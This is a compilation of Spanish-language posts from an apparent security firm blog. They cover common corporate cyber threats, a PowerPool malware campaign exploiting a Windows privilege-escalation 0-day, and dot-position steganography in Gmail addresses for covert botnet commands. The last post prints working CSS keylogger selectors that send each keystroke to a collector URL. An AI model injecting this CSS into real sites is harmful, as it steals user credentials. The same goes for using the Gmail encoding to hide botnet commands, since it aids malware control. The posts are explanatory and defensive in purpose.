¿Cuáles son las principales amenazas, riesgos y retos de ciberseguridad a los que se enfrentan las empresas?

La exposición a ciber-amenazas y ciber-riesgos por parte de las empresas, sigue estando ahí y nunca va a dejar de existir, incrementando enormemente cada día, en cuanto a volumen de casos y en cuanto a disparidad de técnicas, objetivos y complejidad.

Por ese motivo es importante conocer cuáles son los ciberincidentes más habituales en las empresas actualmente, con el objetivo de poder establecer una lista de prioridades de prevención concretas y unas medidas a poner en marcha lo antes posible.

En términos generales, la ciberseguridad sigue siendo un desafío para empresas de todos los tamaños y sectores. Los ciberincidentes varían en naturaleza y pueden incluir desde ataques de phishing, hasta exfiltración de datos a gran escala.

Revisando sólo algunos de los principales informes de referencia del sector, podemos tener las primeras pinceladas de ese lienzo de ciberincidentes o ciberriesgos corporativos.

Más del 50% de empresas han sufrido al menos un ataque de ransomware, mientras los ataques de phishing son la principal preocupación de seguridad para el 57%, según el Informe de Amenazas de Seguridad de Cisco.

Los ataques de phishing y los errores de configuración provocados generalmente por las personas (las cuales suponen el 74% de los ciberincidentes), suponen ya más del 50% de las brechas de datos, según el Informe de Ciberseguridad y el DBIR (Data Breach Investigation Report), de Verizon.

Los problemas de ciberseguridad en las empresas, pueden atribuirse al factor humano, a las personas, en el 95% de los casos, según el informe Global Risk Report del World Economic Forum.

Durante el último año, los ciberataques a aplicaciones web se han incrementado en un 21%, mientras que los ciberataques de robo de credenciales lo han hecho en un 22%, según el Informe de Amenazas de Seguridad de Internet de Akamai.

Como muestra, un botón. Estos son sólo algunos ejemplos, pero hay muchos más, que evolucionan en el tiempo y, lamentablemente, no siempre para mejorar la estadística ni la situación.

Siendo este el escenario, actualmente, algunos de los ciberincidentes más habituales son los siguientes, o son debidos a las siguientes causas (las principales, ciñéndonos a los estudios, informes y análisis existentes):

• Ataques de ingeniería social, ataques a las personas, al factor humano, o ataques de cualquier otro tipo, que comienzan con una acción de ingeniería social, los cuales, en la mayoría de los casos, llegan a través de phishing en cualquiera de sus variantes (smshing, vishing, qrshing, spear phishing, etc.) o de otros canales, medios, o tácticas empleadas por los ciberdelincuentes. Este tipo de ataques suelen dirigirse a empleados dentro de las empresas y, casi siempre, a empleados muy concretos (directivos, contables, personal de compras, VIPs -Very Important People- y/o VAPs -Very Attacked People-), quienes son engañados para revelar información privada y confidencial, o para descargar y ejecutar malware sin ser conscientes.

• Los ataques de phishing en sí mismos, ya sean de suplantación de identidad (tipo BEC - Business Email Compromise) o no, en cualquiera de sus modos de entrega y “sabores” (por correo electrónico, por SMS, en una llamada de teléfono, por WhatsApp, al leer un QR, etc.).

• Los dos anteriores (ingeniería social y phishing de todo tipo), entre otros tipos de ataques, producen a su vez exfiltración de datos, o violaciones de datos e información. Este es un gravísimo problema puesto que se exponen datos de clientes, información personal, o información legal, industrial o financiera de la empresa atacada.

• Los cibersecuestros o ataques de ransomware, cuyo número de casos aumenta considerablemente a medida que pasa el tiempo, sofisticándose cada vez más, siendo más dañinos y dirigiéndose a empresas de todo tipo de sectores y tamaño (negocios, autónomos, micropymes, pymes, grandes empresas, multinacionales). Estos ataques cifran la información y documentos, bloqueando el acceso datos y sistemas, exigiendo un rescate para restaurar el acceso, descifrándolos.

Además, existen otros tipos de amenazas a las que también se ve expuestas las empresas, aunque no en tanta cuantía como las anteriores:

• El malware en general (virus, troyanos, gusanos, botnets, spyware, etc.), que llega a la empresa (su perímetro, dispositivos internos y externos, red corporativa, nueva, infraestructuras, etc.) por diferentes canales (email, phishing, descargas, USBs, etc.) y realiza la actividad maligna, ilícita o dañina para la que está programado. En muchas ocasiones, existen variantes o muestras de malware aún desconocidas (de reciente creación) que pueden ser utilizadas para atacar e infectar. Este tipo de ataques se suele conocer como ataques Zero Day, 0-Day, o de Día Cero.

• La explotación de vulnerabilidades supone atacar por los puntos más débiles detectados en alguna de las aplicaciones o software de uso corporativo, así como su red, arquitectura hardware, infraestructura, cloud, sistemas informáticos de la organización, e incluso dispositivos (IT, OT, IT/OT e IoT). En muchas ocasiones, existen vulnerabilidades aún desconocidas que pueden ser explotadas por quienes las hayan detectado antes que nadie. Este tipo de ataques también se suele conocer como ataques Zero Day, 0-Day, o de Día Cero.

• Los ataques de denegación de servicio (DoS / DDoS), realizados consiguiendo alinear, de forma simultánea, peticiones masivas desde multitud (miles, cientos de miles, millones) de puntos o dispositivos, a un único elemento común (servidor web, base de datos, sistema de acceso, formulario de introducción de datos, API, etc.), con lo que se consigue saturar, colapsar y dejar fuera de servicio a ese sistema, sin necesidad de infectarlo ni realizar ningún otro tipo de acción. Pueden ser de tipo DoS (ataque de Denegación de Servicios) o de tipo DDoS (ataque Distribuido de Denegación de Servicios) y, generalmente, son lanzados desde una BotNet (una red de ordenadores, conocidos como zombies, que previamente han sido “capturados” para tomar el control sobre ellos y poder solicitarles que realicen determinadas acciones, como conectarse todos al mismo tiempo y de forma recurrente a un servicio web para provocar un DoS, un DDoS, un minado de criptomonedas, etc.).

• Los ataques a (o desde) el Internet de las Cosas (Internet of Things - IoT) e infraestructuras corporativas son también habituales, especialmente en empresas de entornos industriales. En este caso se aprovechan agujeros de seguridad y configuraciones incorrectas de dispositivos como cámaras, impresoras, PLCs, electrodomésticos inteligentes, etc.

• La inyección de código, o inyección de código SQL, que consiste en atacar un servicio web (generalmente a través de un formulario con campos para la introducción de datos), introduciendo código SQL en los campos vulnerables en los que sea posible, para lograr acceder a las bases de datos y extraer su información.

• Las APTs o Amenazas Avanzadas Persistentes, considerados unos de los ataques más evolucionados, que adoptan tecnologías, mecanismos y estrategias más sofisticadas, complejas y dirigidas. En este caso, consiste en casos de hacking que se realizan de forma continuada sobre una organización para conseguir entrar y permanecer en ella durante mucho tiempo, realizando su actividad dañina.

Por supuesto, existen muchos otros tipos de ciberamenazas, ciberriesgos y ciberataques a empresas, tales como:

• Aquellos que atacan a sus infraestructuras cloud, internas o externas de un tercero y a las aplicaciones existentes en ellas. En este caso, por ejemplo, podríamos hablar de shadow IT o los riesgos de infraestructuras que no controla el departamento de IT de la organización (como lo son las infraestructuras en la nube contratadas a proveedores cloud).

• Relacionado con el punto anterior, debido especialmente a la cada vez más grande dependencia de servicios de terceros, uno de los riesgos más comunes, que menos se tiene en cuenta pero que está cobrando especial relevancia y atención, es el de la cadena de suministro. Es decir, el de aquellos riesgos que, no siendo propios o inherentes a la empresa como tal, sí pueden afectar a ésta pues son riesgos de un tercero en el que tiene alojados sus servicios o con el que colabora para algo en concreto, incluso socios, partners, etc.

• Insiders o amenazas internas que, como usuarios internos de los sistemas de la organización (ya sean empleados, proveedores, colaboradores o partners), de forma intencionada o no, pueden realizar acciones perjudiciales y dañinas a causa de su falta de conocimiento y formación, desidia, descuido, configuraciones incorrectas, cese de accesos, credenciales y permisos, uso y conexión de dispositivos externos a la red corporativa, etc.

• Los ataques directos a sus activos de información, tales como bases de datos (o elementos contenedores de información) de clientes, proveedores, socios, usuarios, colaboradores, o la propia de la organización (propiedad intelectual, patentes, legal, societaria, financiera, etc.), con información privada y confidencial, que pueden producir, además de fugas de información, importantes problemas a la empresa en términos económicos, de cumplimiento normativo, legales, y de imagen, reputación, marca y continuidad de negocio.

• El desarrollo no seguro de software y aplicaciones propias corporativas, que no cuentan con una filosofía de la ciberseguridad desde el diseño, incurriendo en bugs, brechas de seguridad y vulnerabilidades que pueden ser explotadas por terceros. Parta subsanarlo, se requiere un modelo de Ciclos de Desarrollo Seguro de Software (SSDLC).

• La falta de adecuación técnica para el debido cumplimiento normativo (falta de compliance) es otro factor a tener muy en cuenta. En este caso, el no cumplir con determinados estándares y marcos de ciberseguridad y legalidad definidos, con determinadas normas, reglamentos y leyes, puede acarrear serios problemas. Ya no por no cumplir y las sanciones o multas que esto puede conllevar, sino también por los agujeros de seguridad y la falta de protección de calidad que supondrá el no cumplir con ellos.

Entre todo este maremágnum de riesgos, amenazas y las probabilidades de sufrir un ciberincidente, subyacen aspectos (motivos), no siempre tecnológicos, que, si no es que los provoquen directamente, quizá si sean factores determinantes en muchas ocasiones y caldo de cultivo para que se materialicen. Algunos de ellos podrían ser:

• La falta de concienciación, formación y entrenamiento de los empleados.

• La evolución continua de la tecnología y la digitalización que requieren una actualización constante y cuasi inmediata. Y, del mismo modo, la evolución (a la zaga) de las nuevas legislaciones, reglamentos y normativas que vienen a tratar de regularla y “poner cierto orden de conducta”, con una visión lo más holística posible, en multitud de países con características comunes o no.

• La capacidad económica, financiera, de inversión y recursos dentro de la organización. Una organización puede tener cierto conocimiento y destreza para llevar a cabo su propia estrategia de ciberseguridad, pero no es lo habitual. Si éste no es su core business o su área de TI no cuenta con esas capacidades, recursos o tiempo, lo normal y aconsejable es recurrir a expertos externos y a la adquisición de software, aplicaciones, herramientas y servicios de ciberseguridad.

Estos quizá sean los retos principales que deben cumplir las empresas para poder comenzar a adaptarse, protegerse convenientemente, prevenir y cumplir.

En un mundo donde la tecnología es omnipresente, la ciberseguridad se vuelve fundamental para la sostenibilidad y el crecimiento de cualquier empresa. Los riesgos y desafíos en este ámbito evolucionan constantemente, exigiendo un compromiso continuo con estrategias de ciberseguridad sólidas y una mentalidad proactiva para enfrentar estas amenazas de manera efectiva y eficiente.

¿Está tu empresa preparada y libre de ciber-amenazas y ciber-riesgos?

Quizá necesitéis la ayuda de servicios profesionales de ciberseguridad como los que ofrecemos en Zerolynx: Servicios de Ciberseguridad.

Si lo prefieres, contáctanos y hablamos.

Íñigo Ladrón Morales, Redactor de contenidos para Zerolynx.

Ciberamenazas: el mayor riesgo para las empresas en 2022

El Informe de Riesgos Globales 2022 (The Global Risks Report 2022) analiza las principales alarmas a nivel internacional con carácter anual y las clasifica en función de su impacto e incertidumbre. Este año el catálogo se compone de 37 riesgos globales.  

Uno de los riesgos a considerar es la falta de seguridad cibernética. Nuestra, cada vez mayor, dependencia de sistemas digitales ha convertido la ciberseguridad en uno de los principales desafíos que enfrenta la humanidad y, la falta de esta, en una amenaza que supera la capacidad de las sociedades para prevenirla y gestionarla eficazmente.  A nivel global en el año 2021 ha habido un incremento de un 358% de ciberataques basados en software malicioso (malware) y un 435% en secuestro informático (ransomware). Esto, sumado a los 3 millones de profesionales necesarios en todo el mundo, convierten a las ciberamenazas en un riesgo cada vez más cercano y real. 

Ante estos ciberataques, podemos ayudar a protegerte, para más información sigue este enlace. Y si quieres conocer más información sobre los riesgos globales de 2022, consulta el informe completo. 

Primer malware que explota el exploit de ALPC LPE

Como ya hemos comentado en entradas anteriores, hace unos días una investigadora de seguridad descubrió un 0-day que permite la escalada de privilegios local hasta SYSTEM en Windows 10 a cualquier usuario del sistema.

Como podemos leer en el blog de ESET, han pasado sólo dos días hasta que han encontrado la primera muestra que hace uso de este jugoso exploit. La muestra, asociada a una campaña del grupo bautizado como PowerPool, se ha detectado en Chile, Alemania, India, Filipinas, Polonia, Rusia, el Reino Unido, Estados Unidos y Ucrania.

Los actores maliciosos han modificado el exploit original para cambiar los privilegios del fichero de actualizaciones de Google, situado en el siguiente directorio:

Una vez cambiados los privilegios, lo pueden sustituir con el second-stage de su malware, consiguiendo así obtener permisos de SYSTEM cada vez que se ejecute el sistema de actualizaciones de Google.

Aunque no se tienen demasiados datos, parece que el compromiso inicial lo están realizando al menos mediante dos mecanismos. El primero de ellos es el envío directo de un first-stage como adjunto de correo a buzones concretos. El segundo es mediante spam con ficheros .slk, que permite el compromiso a través de un mecanismo ya reportado a finales de mayo en los foros del Internet Storm Center del SANS.

Este segundo mecanismo permite ejecutar código desde Excel. Podemos ver el ejemplo mostrado en los foros del SANS, en el que se puede ver que si actualizas el código dinámico de una celda acabaríamos ejecutando un típico ataque basado en Powershell.

Durante la investigación han encontrado, precisamente, un ejemplo de estos correos de SPAM con un fichero slk malicioso.

Tras el análisis del malware parece confirmarse que el first-stage ofrece un mecanismo de triaje a los operadores. El malware puede ejecutar algunos comandos básicos dirigidos al reconocimiento del sistema afectado, es capaz de tomar capturas de pantalla de la víctima, y posteriormente puede exfiltrar la información al C&C junto a datos de configuración del proxy del sistema. Como dato curioso, los operadores han cometido el error de tener la dirección del servidor de comando y control hardcodeada en el código.

Presumiblemente, una vez que los operadores deciden que un sistema es interesante, utilizan el first-stage para descargar la carga secundaria. De nuevo, en este segundo stage el malware tiene hardcodeados los datos del C&C, y se ha confirmado que los operadores no tienen capacidad de actualizar esta importante configuración del malware. Esta carga secundaria permite a los operadores ejecutar comandos, matar procesos, subir y bajar ficheros, y listar los contenidos de carpetas del sistema.

Las herramientas que utilizan los actores maliciosos para ayudarse en la etapa de movimiento lateral son viejas conocidas para la mayoría, como son PowerDump, PowerSploit, Invoke-SMBEnum, Quarks PwDump y FireMaster.

Era de esperar que con la publicación abierta de semejante 0-day, que sigue sin ser parcheado por Microsoft, algún grupo malicioso lo incorporase en su arsenal. Mientras tanto, podéis estar al tanto de los IOC disponibles, o intentar desplegar la mitigación no aprobada por Microsoft que se menciona en el CERT/CC.

¡Un gran trabajo de ESET!

Enviando instrucciones ocultas a través de Gmail

Una de las características menos conocidas de Gmail hace referencia a la interpretación del carácter "." (punto) en los nombres de las cuentas de los usuarios de Gmail. Gmail no interpreta este caracter, por lo que enviar un correo electrónico a my.email@gmail.com y a myem.ail@gmail.com produce el mismo resultado; el usuario recibirá el correo electrónico correctamente, pero mostrará en el encabezado que el referer tiene el punto ubicado en un lugar diferente. Esta característica permite que la posición del punto se use para enviar mensajes secretos usando técnicas esteganográficas.

La técnica presentada puede tener muchos usos, y entre ellos, algunos maliciosos. En el caso de la creación de malware, la posición del punto se puede utilizar por ejemplo para camuflar los comandos enviados por correo electrónico desde un panel de control a los bots de una botnet, determinando la instrucción que deben realizar.

Para ampliar el número de instrucciones que podrían ocultarse sin la necesidad de crear cuentas de Gmail con nombres largos, una posibilidad que se nos ocurrió en el año 2015, y que presentamos como paper al congreso RootedCON 2016 (aunque no fue seleccionada para conferencia), fue el uso de codificación binaria, tomando la existencia de un punto como un 1 lógico y la inexistencia del punto como un 0. Por ejemplo, una instrucción enviada al bot podría ser "myem.ai.l@gmail.com", y el código binario traducido sería el número 000101, que podría corresponder internamente con una instrucción del malware para capturar la cámara web del dispositivo troyanizado.

La siguiente figura presenta una tabla con el número de instrucciones que se pueden codificar utilizando esta técnica, dependiendo del tamaño de la cuenta de correo electrónico registrada en Gmail. Estas cuentas, según la política de Google, deben tener un tamaño de entre 6 y 30 caracteres, lo que determina un valor máximo de 2^(n-1), donde n es el valor máximo del carácter de una cuenta de Gmail, es decir, 536,870,912 comandos posibles; un valor suficiente para codificar todas las instrucciones de un malware u ocultar mensajes más complejos.

Recientemente, James Fisher publicó una interesante aproximación de esta técnica, que podría ser utilizada para Scam. Podéis leer el artículo completo aquí.

Esta técnica es habitualmente utilizada para crear múltiples cuentas en servicios de Internet, utilizando una única dirección de correo de Gmail, y aprovechando que en el registro en todos estos servicios no se comprueba si el email es "parecido" a uno ya registrado, simplemente suelen verificar si existe uno idéntico. De esta manera, pueden registrarse múltiples usuarios y todos los emails enviados por los proveedores de los servicios llegarán sin problemas a la cuenta de correo registrada de Gmail.

¡Saludos!

Fuente imagen: google.com

Keylogger CSS: robando credenciales a través de CSS

En los últimos años las medidas de seguridad de los sitios web han mejorado exponencialmente, gracias al uso de frameworks que permiten automatizar la codificación, evitando así fallos humanos durante los procesos de desarrollo. Metodologías como OpenSAMM también han puesto su granito de arena para mejorar la seguridad global de las aplicaciones web, pero las posibles brechas que pueden presentarse en estos entornos son muchas, y en multitud de ocasiones, desconocidas.

En los procesos de hacking ético sobre aplicaciones web en los que participamos desde Zerolynx, nos encontramos habitualmente una gran variedad de inyecciones de código (sql, xss, commands, etc.), pero una de ellas siempre nos ha resultado curiosa por encima de las demás, las inyecciones CSS. Aunque en muchas metodologías de auditoría no están representadas como un tipo concreto, suelen identificarse en sitios web desarrollados bajo frameworks como Liferay, Joomla y similar, por descuidos de los maquetadores que de alguna u otra manera dejan expuesto algún lugar (como un input) donde poder alterar los CSS del sitio web. Es en casos concretos como este donde un atacante puede disfrutar de su ingenio para desarrollar un exploit con el que poder sustraer datos críticos.

Recientemente, Max Chehab, de la universidad de Gonzaga, publicaba en su cuenta de Github un interesante Keylogger desarrollado en CSS, con el que poder sustraer las credenciales de un sitio web. Podéis descargar la prueba de concepto a continuación:

https://github.com/maxchehab/CSS-Keylogging

La explotación funciona debido a que la página que propone Chehab utiliza frameworks como React.js -  https://reactjs.org 

React sincroniza los valores que están siendo introducidos por los usuarios en un <input>, por ejemplo, cuando introducen unas credenciales de autenticación.

Imaginaros la siguiente porción de código CSS:

input[value$="Z"] {
     background-image: url("http://localhost:3000/Z");
 }

Se trata de un selector de CSS que solo aplica cuando se pulsa la letra "Z". Por otro lado, se establece una imagen inexistente como fondo de pantalla,  haciendo así una petición a una dirección de nuestro control, en la que podríamos tener por ejemplo una API Rest escuchando. Si esto lo ampliamos a todo el abecedario, números y símbolos, tendríamos un "keylogger" funcional recogiendo todas y cada una de las pulsaciones de un usuario. Interesante técnica ¿verdad?

input[value$="Z"] { background-image: url("http://localhost:3000/Z");}

input[value$="e"] { background-image: url("http://localhost:3000/e");}

input[value$="r"] { background-image: url("http://localhost:3000/r");}

input[value$="o"] { background-image: url("http://localhost:3000/o");}

input[value$="L"] { background-image: url("http://localhost:3000/L");}

input[value$="y"] { background-image: url("http://localhost:3000/y");}

input[value$="n"] { background-image: url("http://localhost:3000/n");}

input[value$="x"] { background-image: url("http://localhost:3000/x");}

Por técnicas como esta es especialmente crucial validar los CSS utilizados durante los procesos de desarrollo de nuestras aplicaciones web, sobretodo si provienen de terceros, donde un usuario malintencionado podría dejar keyloggers CSS ocultos para robar credenciales de forma sencilla.